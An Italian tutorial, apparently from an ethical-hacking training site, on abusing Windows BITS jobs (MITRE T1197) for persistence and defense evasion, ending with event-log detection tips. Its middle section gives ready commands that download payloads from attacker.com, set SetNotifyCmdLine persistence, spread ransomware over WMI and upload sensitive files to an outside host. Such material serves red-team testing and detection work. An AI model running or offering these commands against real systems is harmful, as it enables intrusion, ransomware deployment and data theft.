BITS Jobs Abusati: BITS Jobs (T1197)
Windows Background Intelligent Transfer Service (BITS) è un servizio nativo di Windows che gestisce trasferimenti asincroni di file a bassa banda, utilizzando la banda disponibile senza interferire con altre applicazioni di rete. Gli attaccanti sfruttano questa funzionalità legittima per scaricare payload maligni, eseguire codice e mantenere persistenza sui sistemi compromessi.
Questa tecnica si manifesta in due tattiche della kill chain: TA0003 (Persistence) dove gli attaccanti creano job BITS di lunga durata che sopravvivono ai riavvii del sistema, e TA0005 (Defense Evasion) poiché le operazioni BITS sono spesso considerate legittime dai firewall e dagli antivirus. L'abuso di BITS è documentato in 5 gruppi APT e 8 famiglie di malware, rendendola una tecnica particolarmente diffusa nel panorama delle minacce moderne.
La pericolosità deriva dalla natura stessa del servizio: i job BITS possono durare fino a 90 giorni per default, non creano nuovi file o modifiche al registro evidenti, e possono eseguire programmi arbitrari al completamento o in caso di errore.
Per testare la resilienza dei sistemi contro l'abuso di BITS, inizia creando un job di download base. Il comando più semplice utilizza BITSAdmin dalla riga di comando:
bitsadmin /transfer myDownloadJob /download /priority normal https://attacker.com/payload.exe C:\Users\Public\payload.exe
PowerShell offre controllo più granulare attraverso i cmdlet BITS. Puoi creare job persistenti che eseguono payload al completamento:
$job = Start-BitsTransfer -Source https://attacker.com/beacon.exe -Destination C:\ProgramData\update.exe -Asynchronous
La vera potenza sta nell'opzione SetNotifyCmdLine che permette l'esecuzione automatica. Con BITSAdmin puoi configurare un comando da eseguire quando il job termina:
bitsadmin /create backdoorJob bitsadmin /addfile backdoorJob https://legit-site.com/small.txt C:\Windows\Temp\done.txt bitsadmin /SetNotifyCmdLine backdoorJob C:\ProgramData\update.exe "" bitsadmin /resume backdoorJob
Per simulare la persistenza avanzata usata da APT41 e Wizard Spider, combina BITS con WMI. Questo approccio permette di distribuire ransomware su multiple macchine:
wmic /node:targetPC process call create "cmd /c bitsadmin /transfer pwn /download /priority high https://c2.attacker.com/ransomware.exe C:\Windows\Temp\svchost.exe & C:\Windows\Temp\svchost.exe"
Un test completo dovrebbe includere anche l'esfiltrazione dati. APT39 ha dimostrato come BITS possa caricare file verso server esterni:
bitsadmin /transfer exfilJob /upload /priority low C:\Users\Administrator\Documents\sensitive.zip https://attacker.com/upload.php
Per verificare la detection, monitora gli Event ID 59-61 nel log Microsoft-Windows-Bits-Client/Operational durante l'esecuzione dei comandi.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo